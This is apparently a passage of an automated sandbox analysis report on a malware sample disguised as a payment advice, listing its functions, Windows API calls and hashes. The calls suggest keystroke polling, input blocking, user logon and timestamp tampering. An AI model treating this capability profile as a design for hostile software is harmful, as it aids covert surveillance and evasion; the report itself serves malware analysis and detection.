                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ErrorLastinet_addrsocket
                          • String ID:
                          • API String ID: 4170576061-0
                          • Opcode ID: cabea8b38002fa781011b5f0595ab941099387897a9684b67fae1790c0a48004
                          • Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
                          • Opcode Fuzzy Hash: cabea8b38002fa781011b5f0595ab941099387897a9684b67fae1790c0a48004
                          • Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
                          Function 00456354 Relevance: 7.6, APIs: 5, Instructions: 127keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetCursorPos.USER32(004A83D8), ref: 0045636A
                          • ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                          • GetAsyncKeyState.USER32(?), ref: 004563D0
                          • GetAsyncKeyState.USER32(?), ref: 004563DC
                          • GetWindowLongW.USER32(?,000000F0), ref: 00456430
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: AsyncState$ClientCursorLongScreenWindow
                          • String ID:
                          • API String ID: 3539004672-0
                          • Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                          • Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
                          • Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                          • Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
                          Function 004772DE Relevance: 7.6, APIs: 5, Instructions: 67windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                          • IsWindowVisible.USER32 ref: 00477314
                          • IsWindowEnabled.USER32 ref: 00477324
                          • GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
                          • IsIconic.USER32 ref: 0047733F
                          • IsZoomed.USER32 ref: 0047734D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                          • String ID:
                          • API String ID: 292994002-0
                          • Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                          • Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
                          • Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                          • Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
                          Function 00436D2D Relevance: 7.6, APIs: 5, Instructions: 52filetimeCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,74DF3220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                          • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
                          • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: File$CloseCreateHandleTime
                          • String ID:
                          • API String ID: 3397143404-0
                          • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                          • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                          • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                          • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                          Function 0044EBBC Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 551COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _strncmp
                          • String ID: ACCEPT$^$h
                          • API String ID: 909875538-4263704089
                          • Opcode ID: a6541d7913cd7701a75e3a8dc778404717b64597fc065691f0327c8a2e2ba149
                          • Instruction ID: 72a2cba82410d8b1d90f72ff5cad5771b474d57714a55a9933f2c727144888ce
                          • Opcode Fuzzy Hash: a6541d7913cd7701a75e3a8dc778404717b64597fc065691f0327c8a2e2ba149
                          • Instruction Fuzzy Hash: AE22A0746083818FE725CF29C48076BBBE2BFC9304F24896EE8D587351D779984ACB56
                          Function 0045C999 Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                          • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Find$File$CloseFirstNext
                          • String ID:
                          • API String ID: 3541575487-0
                          • Opcode ID: cd42767256c3935660832567e39f7af9e021373ba4cf75ddba00705dd7020de4
                          • Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
                          • Opcode Fuzzy Hash: cd42767256c3935660832567e39f7af9e021373ba4cf75ddba00705dd7020de4
                          • Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
                          Function 00436ADE Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
                          • FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
                          • FindClose.KERNEL32(00000000), ref: 00436B13
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: FileFind$AttributesCloseFirst
                          • String ID:
                          • API String ID: 48322524-0
                          • Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                          • Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
                          • Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                          • Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA
                          Function 00443390 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                          • __time64.LIBCMT ref: 004433A2
                            • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                            • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Time$FileSystem__aulldiv__time64
                          • String ID: rJ
                          • API String ID: 2893107130-1865492326
                          • Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                          • Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
                          • Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                          • Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
                          Function 00443391 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                          Download Yara Rule
                          APIs
                          • __time64.LIBCMT ref: 004433A2
                            • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                            • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Time$FileSystem__aulldiv__time64
                          • String ID: rJ
                          • API String ID: 2893107130-1865492326
                          • Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                          • Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
                          • Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                          • Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
                          Function 0044289D Relevance: 3.1, APIs: 2, Instructions: 82networkfileCOMMON
                          Download Yara Rule
                          APIs
                          • InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
                          • InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
                            • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Internet$AvailableDataErrorFileLastQueryRead
                          • String ID:
                          • API String ID: 901099227-0
                          • Opcode ID: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                          • Instruction ID: 2c15810e60b1cb59304632cc8162977c32d0240baa2dcf3c2cd6ef22f942a6bb
                          • Opcode Fuzzy Hash: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                          • Instruction Fuzzy Hash: 452174B12043016BF220EF56DD45FAFB3E8ABD4715F40492EF285A6180D7B8E949C76A
                          Function 0045DD7C Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
                          • FindClose.KERNEL32(00000000), ref: 0045DDDD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID:
                          • API String ID: 2295610775-0
                          • Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                          • Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
                          • Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                          • Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
                          Function 0047CBF0 Relevance: 2.9, Strings: 2, Instructions: 418COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0vH$HH
                          • API String ID: 0-728391547
                          • Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                          • Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
                          • Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                          • Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
                          Function 0040F890 Relevance: 2.1, APIs: 1, Instructions: 589COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _memset
                          • String ID:
                          • API String ID: 2102423945-0
                          • Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                          • Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
                          • Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                          • Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
                          Function 0047E1FA Relevance: 2.0, APIs: 1, Instructions: 499COMMON
                          Download Yara Rule
                          APIs
                          • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Proc
                          • String ID:
                          • API String ID: 2346855178-0
                          • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                          • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                          • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                          • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                          Function 0045A259 Relevance: 1.5, APIs: 1, Instructions: 21keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • BlockInput.USER32(00000001), ref: 0045A272
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: BlockInput
                          • String ID:
                          • API String ID: 3456056419-0
                          • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                          • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                          • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                          • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                          Function 0043916A Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: LogonUser
                          • String ID:
                          • API String ID: 1244722697-0
                          • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                          • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                          • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                          • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                          Function 004711D2 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: NameUser
                          • String ID:
                          • API String ID: 2645101109-0
                          • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                          • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                          • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                          • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
                          Function 0042202E Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                          Download Yara Rule
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                          • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                          • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                          • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                          Function 00412C38 Relevance: .4, Instructions: 384COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
